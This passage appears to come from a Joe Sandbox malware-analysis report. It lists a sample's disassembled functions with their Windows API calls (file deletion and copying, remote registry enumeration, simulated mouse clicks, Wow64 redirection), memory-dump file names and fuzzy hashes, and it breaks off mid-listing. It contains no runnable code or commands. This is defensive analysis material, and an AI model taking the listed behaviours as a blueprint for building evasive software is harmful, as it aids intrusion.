Wow64DisableWow64FsRedirection, xrefs: 0059634A
kernel32.dll, xrefs: 00596336

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: a1fd8075361f0119c832b38f87473fe8a30dd36f7582bcf3974bc7bab9452d0d
Instruction ID: 9c8d88065919156de847ba3590af83eee0facae693dac196d7298fa6613b058a
Opcode Fuzzy Hash: a1fd8075361f0119c832b38f87473fe8a30dd36f7582bcf3974bc7bab9452d0d
Instruction Fuzzy Hash: 94E08C32602F225797222B15AC0DAAA6A1AAF86B27B0A0115F904E3200DFA0CC1AC4B1

Uniqueness

Uniqueness Score: -1.00%

Function 005962FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00596316
FreeLibrary.KERNEL32(00000000,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596329

Strings

Wow64RevertWow64FsRedirection, xrefs: 00596310
kernel32.dll, xrefs: 005962FD

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: f0ac217bf1f89ee3cc5ba6c86c0bf255fe061c801a68770e71760684716d76fb
Instruction ID: 20847d40b27dcad8b6bcb59149486e1f66c1c90ace0a5166f5c1428ecc33770c
Opcode Fuzzy Hash: f0ac217bf1f89ee3cc5ba6c86c0bf255fe061c801a68770e71760684716d76fb
Instruction Fuzzy Hash: F6D01235642D3157C7322725BC1C9CE7E16EE89B113464415F800A3128DF60CD16C5D1

Uniqueness

Uniqueness Score: -1.00%

Function 0060321B Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006034D9
DeleteFileW.KERNEL32(?), ref: 0060355B
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00603571
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00603582
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00603594

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 0503ccc524d24fff01159c53d88fe7e4f6829a3c433ac5b1e85d0e1ec63f0981
Instruction ID: 72e6c757297a03bb7ce66136aadcf72d0f906ef1574daa4596c7412e2f620a49
Opcode Fuzzy Hash: 0503ccc524d24fff01159c53d88fe7e4f6829a3c433ac5b1e85d0e1ec63f0981
Instruction Fuzzy Hash: 15B15071900129ABDF15DFA4CC89EDFBBBDEF45315F1040AAF509E6281EA31AB458F60

Uniqueness

Uniqueness Score: -1.00%

Function 0061ACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0061AD86
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0061AD94
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0061ADC7
CloseHandle.KERNEL32(?), ref: 0061AF9C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: f40d5e50acbad0d4d4be22dc778a326946acd33c568567aba31f949ba008611a
Instruction ID: 92b03817ff6b32315003cdf4e517cdfa84906e063923cfd64f19472eea05db60
Opcode Fuzzy Hash: f40d5e50acbad0d4d4be22dc778a326946acd33c568567aba31f949ba008611a
Instruction Fuzzy Hash: 67A18171604701AFD720DF24C89AB6ABBE6AF84720F14885DF5599B392DB70EC41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0061C328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 0061D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061C00D,?,?), ref: 0061D314
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D350
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3C7
Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3FD

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C404
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061C45F
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0061C4C2
RegCloseKey.ADVAPI32(?,?), ref: 0061C505
RegCloseKey.ADVAPI32(00000000), ref: 0061C512

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 13b7c8335720de87912696ac3f6e7c7142e8e55c26ab85c71a6542c0c38c9d3f
Instruction ID: e63afe3172d42d3ffe811fa40864202689626c30b9be879dd8e5ebebe01460d3
Opcode Fuzzy Hash: 13b7c8335720de87912696ac3f6e7c7142e8e55c26ab85c71a6542c0c38c9d3f
Instruction Fuzzy Hash: 8E618331208241AFD714DF24C494EBABBE6FF84318F18855CF4598B2A2DB31ED46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005FEC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 005FE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FD6E2,?), ref: 005FE629

Part of subcall function 005FE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FD6E2,?), ref: 005FE642

Part of subcall function 005FE9C5: GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6

lstrcmpiW.KERNEL32(?,?), ref: 005FEC9F
MoveFileW.KERNEL32(?,?), ref: 005FECD8
_wcslen.LIBCMT ref: 005FEE17
_wcslen.LIBCMT ref: 005FEE2F
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 005FEE7C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: dece055b4274088c260cc762ab282c337f5c4cd3a69f9861edd42890534eae7c
Instruction ID: 10a290d01fbdd36ad1e9ef6f37b14e6283396c2b99f57d3a94498b2ef18791df
Opcode Fuzzy Hash: dece055b4274088c260cc762ab282c337f5c4cd3a69f9861edd42890534eae7c
Instruction Fuzzy Hash: FC5166B200838A5BD774EB54D8859EB7BECBFC4310F00092EF685D3161EF74A6888756

Uniqueness

Uniqueness Score: -1.00%

Function 005C23E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005C2453
_free.LIBCMT ref: 005C2473

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5c67b9bde58cd58056550ba15accb965391210d24b7d7f03223cf297328c5091
Instruction ID: 6ac2a651d45daa0e8fe57a7d5ae05d8e2ffaa11867f96d64e99b109a7aa0450e
Opcode Fuzzy Hash: 5c67b9bde58cd58056550ba15accb965391210d24b7d7f03223cf297328c5091
Instruction Fuzzy Hash: 4241C172A002149FDB24DFB8C885F5ABBE6FF88314F1585ACE515EB291D631AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 006041CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00604225
TranslateAcceleratorW.USER32(?,00000000,?), ref: 0060427C
TranslateMessage.USER32(?), ref: 006042A5
DispatchMessageW.USER32(?), ref: 006042AF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006042C0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 6cc23211ff09386a5e36e38a90ec0832be17ebc12684f5241787edf610638630
Instruction ID: 03cdd522e414fa42f16cceaece7fb62c66c74be2f611affed4daa439eac59e94
Opcode Fuzzy Hash: 6cc23211ff09386a5e36e38a90ec0832be17ebc12684f5241787edf610638630
Instruction Fuzzy Hash: D631F9B06806429EEB3CCB659D58BF737AAEB01304F04156DE662D32E0DFF49985CB11

Uniqueness

Uniqueness Score: -1.00%

Function 005F2191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 005F21A5
PostMessageW.USER32(00000001,00000201,00000001), ref: 005F2251
Sleep.KERNEL32(00000000,?,?,?), ref: 005F2259
PostMessageW.USER32(00000001,00000202,00000000), ref: 005F226A
Sleep.KERNEL32(00000000,?,?,?,?), ref: 005F2272

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 81424015e9ee4d09a2ab9d033f1d8398fa932baaacab75ce811b62d03c8ae253
Instruction ID: c8647bd60a0ca0ac58afb1980f3f10bbefd5ffed615b432811d0493020ea409c
Opcode Fuzzy Hash: 81424015e9ee4d09a2ab9d033f1d8398fa932baaacab75ce811b62d03c8ae253
Instruction Fuzzy Hash: 6931AFB590021DEFDB14CFA8CD89AEE3BB6FB14315F104225FA25AB2D0C774A954CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00626065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 006260A4
SendMessageW.USER32(?,00001074,?,00000001), ref: 006260FC
_wcslen.LIBCMT ref: 0062610E
_wcslen.LIBCMT ref: 00626119
SendMessageW.USER32(?,00001002,00000000,?), ref: 00626175

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 38f18ad6089ce925be05f44753a60df3b859504d7387afe4fad8acbe714e8f94
Instruction ID: 3e33e3a4472a7f166c6e11e037c35d8c2f92f3bb730f82f4b960d55105149918
Opcode Fuzzy Hash: 38f18ad6089ce925be05f44753a60df3b859504d7387afe4fad8acbe714e8f94
Instruction Fuzzy Hash: 23218271900A28ABDB219FA4DC889EEBBBAFF44724F104216FD25DB281D7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005CD15D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 005CD166
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CD189

Part of subcall function 005C3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,005B6A99,?,0000015D,?,?,?,?,005B85D0,000000FF,00000000,?,?), ref: 005C3BE2

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005CD1AF
_free.LIBCMT ref: 005CD1C2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CD1D1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 9cf34d7e7370412d38d85ef2129471b837c39fc79d4e7954863b1c9730f5068d
Instruction ID: 5571ebde7ef9fb14a1bfee158351b8a90ef35336d89a3c867fd76eb3d3af240c
Opcode Fuzzy Hash: 9cf34d7e7370412d38d85ef2129471b837c39fc79d4e7954863b1c9730f5068d
Instruction Fuzzy Hash: 490184726016197F232266FA5C8CE7B6DBEFEC2BA1318013DFD05C2240DE618C02C1B1

Uniqueness

Uniqueness Score: -1.00%

Function 005C3188 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,005BF66E,005B547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005C318D
_free.LIBCMT ref: 005C31C2
_free.LIBCMT ref: 005C31E9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005C31F6
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005C31FF

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9607c0410aa463e6e5c7406e11b73ef8a07d72c56582324c87995e8573c9ddcc
Instruction ID: eb54910c6a3bfafb6665686332217edf4a16f4d493756354e9b47f46616eb51f
Opcode Fuzzy Hash: 9607c0410aa463e6e5c7406e11b73ef8a07d72c56582324c87995e8573c9ddcc
Instruction Fuzzy Hash: BF01F976200E0A7F972267F59C4EF2A1E6EBFD5371B29842CF415D2191EE608943C160

Uniqueness

Uniqueness Score: -1.00%

Function 005F089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?,?,005F0BEE), ref: 005F08BB
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?), ref: 005F08D6
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?), ref: 005F08E4
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?), ref: 005F08F4
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?), ref: 005F0900

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: a8b3a39ebb12f1a1edb95feec30f7676334dcd522b236086b275fe8ee67ab2f1
Instruction ID: b8f17659930ac9632e2d71c9d512da7c86ed9ad4ef1b4097e531e0a00dbed037
Opcode Fuzzy Hash: a8b3a39ebb12f1a1edb95feec30f7676334dcd522b236086b275fe8ee67ab2f1
Instruction Fuzzy Hash: AD018F72600608AFDB204F64DC04BAA7EBEFB48792F185024FA05D3252E7B8DD419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 005FF1A7 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 005FF1C3
QueryPerformanceFrequency.KERNEL32(?), ref: 005FF1D1
Sleep.KERNEL32(00000000), ref: 005FF1D9
QueryPerformanceCounter.KERNEL32(?), ref: 005FF1E3
Sleep.KERNEL32 ref: 005FF21F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: a15f2affe15a82923788b424783bec5bc9173f88613b13e216d22b5e522e2648
Instruction ID: 51d1563c7f06b650e650f0402c91bad7b4440b229b3813437f8b82af66d12ad4
Opcode Fuzzy Hash: a15f2affe15a82923788b424783bec5bc9173f88613b13e216d22b5e522e2648
Instruction Fuzzy Hash: 46011739C00A1DDBDF10AFA4EC4DAEDBF7ABF09711F010466EA01B2650CB349655C765

Uniqueness

Uniqueness Score: -1.00%

Function 00600BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600BE0
CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600BED
CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600BFA
CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600C07
CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600C14
CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600C21

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 88047517d5d25f430ac224f17df8f9f6a9ed190e38a45b81c34ad872d5702f38
Instruction ID: 5875f65473cf26f75727cd3e3c23a72f5ea1f68ba960cb7b41070d867fd311c8
Opcode Fuzzy Hash: 88047517d5d25f430ac224f17df8f9f6a9ed190e38a45b81c34ad872d5702f38
Instruction Fuzzy Hash: C101E271840B16CFD730AF66D880857FBFAEF503193008A3ED09242A71C771A845CF80

Uniqueness

Uniqueness Score: -1.00%

Function 005F64D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 005F64E7
GetWindowTextW.USER32(00000000,?,00000100), ref: 005F64FE
MessageBeep.USER32(00000000), ref: 005F6516
KillTimer.USER32(?,0000040A), ref: 005F6532
EndDialog.USER32(?,00000001), ref: 005F654C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 179018c886c9271ae7a40385c5b52cef274dd6f800bd5b16da77fb8211607fd1
Instruction ID: 0cd61ed91da44a0632753d30320fdede1c43ecbf1afb69f21cbc9abb91d08599
Opcode Fuzzy Hash: 179018c886c9271ae7a40385c5b52cef274dd6f800bd5b16da77fb8211607fd1
Instruction Fuzzy Hash: F701A430500B08ABEB305B20DE4EBA67BB9FF10B05F400559B687B14E1DBF8AA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005C2630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005C264E

